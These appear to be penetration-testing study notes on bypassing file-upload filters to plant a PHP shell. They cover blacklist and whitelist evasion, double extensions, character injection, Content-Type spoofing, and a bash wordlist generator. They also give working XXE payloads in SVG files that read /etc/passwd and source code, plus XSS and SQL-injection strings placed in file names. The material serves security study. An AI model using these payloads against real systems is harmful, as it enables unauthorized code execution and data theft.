Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.
Blacklist Filters
Blacklisting Extensions
$fileName =basename($_FILES["uploadFile"]["name"]);$extension =pathinfo($fileName,PATHINFO_EXTENSION);$blacklist =array('php','php7','phps');if (in_array($extension, $blacklist)) {echo"File type not allowed";die();}
Tip: The comparison above is also case-sensitive, and is only considering lowercase extensions. In Windows Servers, file names are case insensitive, so we may try uploading a php with a mixed-case (e.g. pHp), which may bypass the blacklist as well, and should still execute as a PHP script.
Search for Non-Blacklisted Extensions - Look Content Length
Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.
Whitelist Filters
$fileName =basename($_FILES["uploadFile"]["name"]);if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {echo"Only images are allowed";die();}
Double Extensions
shell.jpg.php
shell.phar.jpeg
Fuzz the upload form with This Wordlist to find what extensions are whitelisted by the upload form
if (!preg_match('/^.*\.(jpg|jpeg|png|gif)$/', $fileName)) { ...SNIP... }
Only consider the final file extension, as it uses (^.*\.) to match everything up to the last (.), and then uses ($) at the end to only match extensions that end the file name
shell.php.jpg should pass the earlier whitelist test as it ends with (.jpg), and it would be able to execute PHP code due to the above misconfiguration, as it contains (.php) in its name.
The web application may still utilize a blacklist to deny requests containing PHP extensions. Try to fuzz the upload form with the PHP Wordlist to find what extensions are blacklisted by the upload form.
Character Injection
We can inject several characters before or after the final extension to cause the web application to misinterpret the filename and execute the uploaded file as a PHP script.
The following are some of the characters we may try injecting:
%20
%0a
%00
%0d0a
/
.\
.
…
:shell.php%00.jpg works with PHP servers with version 5.X or earlier
Windows server: injecting a colon (:) before the allowed file extension (e.g. shell.aspx:.jpg), which should also write the file as (shell.aspx)
for char in'%20''%0a''%00''%0d0a''/''.\\''.''…'':'; dofor ext in'.php''.phps'; doecho"shell$char$ext.jpg">>wordlist.txtecho"shell$ext$char.jpg">>wordlist.txtecho"shell.jpg$char$ext">>wordlist.txtecho"shell.jpg$ext$char">>wordlist.txtdonedone
Then, fuzz extensions
# vim char_injection.sh
# chmod +x char_injection.sh
# ./char_injection.sh
#!/bin/bash
# List of characters
chars=('%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':')
# List of extensions
extensions=('.php' '.phps' '.phar' '.php8')
# Create or clear the wordlist file
> wordlist.txt
# Loop through each character
for char in "${chars[@]}"; do
# Loop through each extension
for ext in "${extensions[@]}"; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
Intercept our upload request and change the Content-Type header to it:
Content-Type: image/jpg
Also try with:
Content-Type: image/png
Note: A file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). We usually need to modify the file's Content-Type header, but in some cases the request will only contain the main Content-Type header (e.g. if the uploaded content was sent as POST data), in which case we will need to modify the main Content-Type header.
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><svg>&xxe;</svg>
Read source code in PHP web applications
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><svg>&xxe;</svg>
XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others.
XXE vulnerability to enumerate the internally available services or even call private APIs to perform private actions
XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
